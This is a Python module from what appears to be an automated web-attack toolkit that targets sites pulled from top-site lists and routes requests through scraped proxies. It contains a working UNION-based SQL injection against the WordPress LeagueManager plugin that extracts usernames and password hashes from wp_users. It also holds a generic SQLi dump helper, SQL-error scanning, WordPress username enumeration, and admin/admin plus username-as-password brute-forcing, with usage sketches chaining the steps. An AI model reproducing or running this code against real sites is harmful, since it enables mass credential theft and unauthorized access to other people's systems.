import os
import re
from io import BytesIO
from os import path
from re import findall
from urllib.parse import urljoin, urlparse
from zipfile import ZipFile

import lxml.html

# Provided elsewhere in the project (not defined in this module): Browser,
# strip_open, out_dir, name (passed as the first Browser argument), out_format,
# celery_output, wp_user, wp_brute, do_brute, _scan_dom, and the WP_GDKEY /
# WP_BUSER / WP_VALID marker constants.


def base_scrape_alexa(url, browser_args, out_name, add_http):
    """Download the Alexa top-1m zip and write one site per line."""
    b = Browser(name, **browser_args)
    r = b.go(url)
    z = ZipFile(BytesIO(r.content), 'r')
    csv_file = 'top-1m.csv'
    z.extract(csv_file, out_dir)
    file_path = path.join(out_dir, csv_file)
    lines = strip_open(file_path)
    out_path = path.join(out_dir, out_name)
    if add_http:
        os.remove(file_path)
        with open(out_path, 'w+') as f:
            for line in lines:
                # Rows look like "rank,domain"; keep just the domain.
                f.write('http://' + line.split(',')[1] + '\n')
    else:
        try:
            os.rename(file_path, out_path)
        except OSError:
            pass
    return len(lines)

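# Usage sketch (values illustrative; the S3 archive URL is the one Alexa
# historically published, and {} stands in for real browser_args):
#
#   count = base_scrape_alexa(
#       'http://s3.amazonaws.com/alexa-static/top-1m.csv.zip',
#       {}, 'alexa_urls.txt', add_http=True)
#   # out_dir/alexa_urls.txt now holds one 'http://<domain>' line per site.
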
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts):
    """Substitute `num` for the `ident` placeholder in an injectable URL and
    return whatever the page echoes between the `left`/`right` markers."""
    b = Browser(name, **browser_args)
    r = b.go(url.replace(ident, str(num)))
    match = findall('{}(.*){}'.format(left, right), r.text)
    if match:
        return match[0]
    # No match: hand the attempt counter back so the caller can retry.
    return attempts

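# Usage sketch (everything hypothetical): the caller supplies a UNION-based
# injection that wraps each extracted value in marker strings, plus a row
# placeholder that this task swaps for `num`. The markers end up inside a
# regex, so they should be free of regex metacharacters:
#
#   row = base_sqli_dump(
#       1, {},
#       "http://target/page.php?id=-1 UNION SELECT "
#       "concat('LFT',user_login,'RGT') FROM wp_users LIMIT [ROW],1--",
#       '[ROW]', 'LFT', 'RGT', attempts=0)
#   # -> the captured value, or `attempts` if the markers never appear.
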
def scan_js(url, browser_args):
    """Return every .js URL referenced in the page at `url`."""
    b = Browser(name, **browser_args)
    r = b.go(url)
    url_re = (r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]'
              r'|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    return [link for link in findall(url_re, r.text) if link.endswith('.js')]

def base_check_keyword(link, browser_args, keywords, check_url=False):
    """Return the final URL if any keyword appears in the response body (or,
    with check_url, in the final URL itself); empty string otherwise."""
    b = Browser(name, **browser_args)
    r = b.go(link)
    if any(x in r.text for x in keywords):
        return r.url
    if check_url and any(x in r.url for x in keywords):
        return r.url
    return ''

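# Usage sketch (keywords hypothetical): flag pages that mention WordPress,
# also checking the post-redirect URL:
#
#   hit = base_check_keyword('http://example.com/', {},
#                            ['wp-content', 'wordpress'], check_url=True)
#   # -> the final URL on a match, '' otherwise.
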
def base_sqli_scan(url, browser_args):
    """Return `url` if the response reads like a SQL error page."""
    b = Browser(name, **browser_args)
    sqli_keys = [['sql', 'syntax'], ['syntax', 'error'], ['sql', 'error'],
                 ['query', 'failed'], ['incorrect', 'syntax']]
    r = b.go(url)
    # A hit requires both words of at least one pair to appear in the body.
    if any(all(key in r.text for key in sub) for sub in sqli_keys):
        return url

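# Typical use: break a query parameter with a stray quote and see whether
# the error page leaks SQL syntax chatter (URL hypothetical):
#
#   vuln = base_sqli_scan("http://target/item.php?id=1'", {})
#   # -> the URL itself when a keyword pair matches, None otherwise.
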
def base_wp_leaguemanager(url, browser_args):
    """Exploit the WP LeagueManager export SQLi to pull a login:hash pair."""
    b = Browser(name, **browser_args)
    params = {
        'league_id': '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,'
                     '13,user_pass,15,16,17,18,19,20,21,22,23,24 '
                     'from wp_users--',
        'mode': 'teams',
        'leaguemanager_export': 'Download+File',
    }
    r = b.go(url, data=params)
    # The export is tab-separated; the login and hash land in fixed columns.
    match = findall('21\t(.*)\t2.*0\t(.*)\t15', r.text)
    if match:
        return ':'.join(match[0])

def base_check_proxy(proxy, browser_args, target_site, target_key):
    """Return `proxy` if it can fetch `target_site` and the body contains
    `target_key`; None on failure."""
    b = Browser(name, change_proxy=False, max_retries=2, max_timeouts=2,
                **browser_args)
    try:
        r = b.go(target_site, proxy=proxy)
    except Exception:
        return
    if r.ok and target_key in r.text:
        return proxy

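# Usage sketch: validate a proxy against a page whose contents are known in
# advance (proxy address from the documentation range, purely illustrative):
#
#   good = base_check_proxy('203.0.113.7:8080', {},
#                           'http://example.com/', 'Example Domain')
#   # -> the proxy string if the page came back intact, None otherwise.
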
def wp_init(url, browser_args, job_name, out_name):
    params = base_wp_init(url, browser_args)
    b = Browser(name, **browser_args)
    r = b.go(url, data=params)
    if WP_GDKEY in r.text:
        # Default admin/admin credentials worked; record the hit.
        celery_output.delay(out_format(url, params), name, job_name, out_name)
    elif WP_BUSER in r.text:
        # The username was rejected; try to discover a real one first.
        wp_user.delay(url, browser_args, job_name, out_name, params)
    else:
        wp_brute.delay(url, browser_args, job_name, out_name, params, 1)

def base_scan_dom(url, browser_args):
    """Run _scan_dom over a page's inline scripts, or over the raw body for
    a bare .js URL."""
    b = Browser(name, **browser_args)
    r = b.go(url)
    if url.endswith('.js'):
        return _scan_dom(r.text)
    matches = []
    doc = lxml.html.document_fromstring(r.text)
    for elem in doc.xpath('//script'):
        matches.extend(_scan_dom(elem.text_content()))
    return matches

def base_scrape_headers(link, browser_args, match):
    """Return the response headers: all of them when `match` is empty,
    otherwise only the fields named in `match` that are present."""
    b = Browser(name, **browser_args)
    r = b.go(link)
    if not match:
        return dict(r.headers)
    matches = {}
    for field in match:
        value = r.headers.get(field)
        if value:
            matches[field] = value
    return matches

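# Usage sketch: grab only fingerprint-relevant headers (field names are just
# examples):
#
#   hdrs = base_scrape_headers('http://example.com/', {},
#                              ['Server', 'X-Powered-By'])
#   # -> e.g. {'Server': 'nginx'}; pass an empty list for all headers.
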
def base_scrape_quantcast(num, browser_args):
    """Scrape one page of Quantcast's US top-sites list."""
    b = Browser(name, **browser_args)
    url = 'http://www.quantcast.com/top-sites/US/{}'.format(num)
    r = b.go(url)
    site = lxml.html.document_fromstring(r.text)
    site.make_links_absolute(r.url)
    links = site.find_class('twoColumn')[0]
    output = []
    for element, attribute, uri, pos in links.iterlinks():
        # Skip anchors with no text to avoid concatenating None.
        if attribute == 'href' and element.text:
            output.append('http://' + element.text)
    return output

def base_scan_wp(url, browser_args):
    WP_LOGIN = '******'
    WP_VALID = ['loginform']
    WP_CAPCH = ['cptch_block']
    b = Browser(name, **browser_args)
    if not url.endswith(WP_LOGIN):
        url = urljoin(url, WP_LOGIN)
    try:
        r = b.go(url)
    except Exception:
        return
    # Only report login pages that render the form and are not captcha-gated.
    if (r.ok and all(x in r.text for x in WP_VALID)
            and not any(x in r.text for x in WP_CAPCH)):
        return url

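# Usage sketch: WP_LOGIN (masked above) is joined onto any base URL, so a
# plain site root is enough; non-WordPress and captcha-protected targets
# come back as None:
#
#   login_url = base_scan_wp('http://example.com/', {})
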
def base_wp_init(url, browser_args):
    """Build a default admin/admin login POST, carrying over the form's
    hidden redirect_to/testcookie fields when present."""
    b = Browser(name, **browser_args)
    r = b.go(url)
    params = {'log': 'admin', 'wp_submit': 'Log In', 'pwd': 'admin'}
    redirect = findall(
        r'"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)
    testcook = findall(
        r'"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)
    if redirect:
        params['redirect_to'] = redirect[0]
    if testcook:
        params['testcookie'] = testcook[0]
    return params

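# Usage sketch: the returned dict is the POST body for login attempts;
# downstream tasks overwrite 'log'/'pwd' with other candidates:
#
#   params = base_wp_init('http://example.com/******', {})
#   # -> {'log': 'admin', 'pwd': 'admin', 'wp_submit': 'Log In', ...}
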
def base_find_user(url, browser_args, params):
    """Try to discover a real WordPress username via ?author=1 and set it as
    both login and password in `params`."""
    WP_LOGIN = '******'
    b = Browser(name, **browser_args)
    url_author = url.replace(WP_LOGIN, '?author=1')
    r = b.go(url_author)
    user = ''
    if 'author/' in r.url:
        # Pretty permalinks leak the username in the redirect URL.
        user = findall(r'author\/([\d\w\-]+)\/', r.url + '/')[0]
    elif 'archive author author-' in r.text:
        # Otherwise the archive page's body class may carry it.
        pos_user = findall(r'archive author author-([\d\w\-]+)', r.text)
        if pos_user:
            user = pos_user[0]
    if not user:
        return
    params['log'] = user
    params['pwd'] = user
    return params

def base_link_scraper(link, browser_args, past, include_external):
    """Collect unseen hrefs from `link`, optionally keeping off-site ones.
    The shared `past` list doubles as the visited set."""
    b = Browser(name, **browser_args)
    past.append(link)
    r = b.go(link)
    doc = lxml.html.document_fromstring(r.text)
    doc.make_links_absolute(r.url)
    root = urlparse(r.url).netloc
    output = []
    for element, attribute, uri, pos in doc.iterlinks():
        if attribute != 'href' or uri in past:
            continue
        past.append(uri)
        url_is_external = urlparse(uri).netloc != root
        # Keep on-site links always; off-site links only when asked for.
        if include_external or not url_is_external:
            output.append(uri)
    return output

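# Usage sketch of a simple breadth-first crawl built on base_link_scraper:
#
#   past, frontier = [], ['http://example.com/']
#   for _ in range(2):  # crawl two levels deep
#       next_frontier = []
#       for page in frontier:
#           next_frontier.extend(
#               base_link_scraper(page, {}, past, include_external=False))
#       frontier = next_frontier
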
def base_scrape_proxy(num, browser_args):
    """Scrape one page of hidemyass.com's proxy list, undoing its CSS-based
    IP obfuscation (decoy spans hidden with display:none)."""
    b = Browser(name, **browser_args)
    url = 'http://hidemyass.com/proxy-list/{}'.format(num)
    r = b.go(url)
    doc = lxml.html.document_fromstring(r.text)
    table = doc.get_element_by_id('listtable')
    rows = table.getchildren()[1:]
    ips = []
    for row in rows:
        columns = row.getchildren()
        port = columns[2].text_content().strip()
        info = columns[1].getchildren()[0].getchildren()
        style = lxml.html.tostring(info[0], encoding='unicode')
        # Collect the CSS class names the inline <style> block hides.
        bad_styles = []
        for css in style.splitlines()[1:-1]:
            if 'none' in css:
                bad_styles.append(css.split('{')[0][1:])
        ip = ''
        # Octets can sit as bare text right after the closing </style> tag...
        tricky_style = re.findall(r'<\/style>(\d{1,3})', style)
        if tricky_style:
            ip += tricky_style[0] + '.'
        for span in info[1:]:
            span_html = lxml.html.tostring(span, encoding='unicode')
            # ...or trail a closing </span> or </div>.
            tricky_html = re.findall(r'(?:<\/span>|<\/div>)\.?(\d{1,3})',
                                     span_html)
            if tricky_html:
                ip += tricky_html[0] + '.'
            # Visible spans holding digits contribute real octets; hidden or
            # bad-class spans are decoys.
            if ('none' not in span_html
                    and not any(bad in span_html for bad in bad_styles)):
                span_text = span.text_content()
                if re.search(r'\d', span_text):
                    ip += span_text + '.'
        ips.append(ip[:-1] + ':' + port)
    return ips

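# The obfuscation being undone, in miniature (markup hypothetical but
# representative of what this parser targets):
#
#   <span>
#     <style>.a1 {display:none}</style>203<span class="a1">99</span>
#     <span style="display:none">77</span><span>.0.113</span>.7
#   </span>
#
# Decoy octets are hidden inline or via a display:none class; the real ones
# are the visible digit runs plus the bare text after closing tags.
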
def init_wp(self, my_link):
    if my_link.pwd:
        return do_brute(my_link)
    try:
        params = base_wp_init(my_link.item, self.browser_args)
    except Exception as e:
        return self.error_catch('wp init', my_link, e)
    b = Browser(name, **self.browser_args)
    r = b.go(my_link.item, data=params)
    if not all(x in r.text for x in WP_VALID):
        return
    if WP_GDKEY in r.text:
        # admin/admin worked on the first try; record it and stop.
        return self.output.append(out_format(my_link.item, params))
    elif WP_BUSER in r.text:
        # Bad username: swap in a discovered author name before queueing.
        params = base_find_user(my_link.item, self.browser_args, params)
        if not params:
            return
    my_link.params = params
    self.to_input.append(my_link)

def base_wp_brute(url, browser_args, params):
    """Return `url` when the login POST in `params` succeeds."""
    b = Browser(name, **browser_args)
    r = b.go(url, data=params)
    if WP_GDKEY in r.text:
        return url

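# End-to-end sketch of the WordPress chain, single-process and celery-free
# (target hypothetical):
#
#   login = base_scan_wp('http://example.com/', {})
#   if login:
#       params = base_wp_init(login, {})
#       if base_wp_brute(login, {}, params) is None:
#           # admin/admin failed; retry with the discovered author name.
#           params = base_find_user(login, {}, params)
#           if params:
#               print(base_wp_brute(login, {}, params))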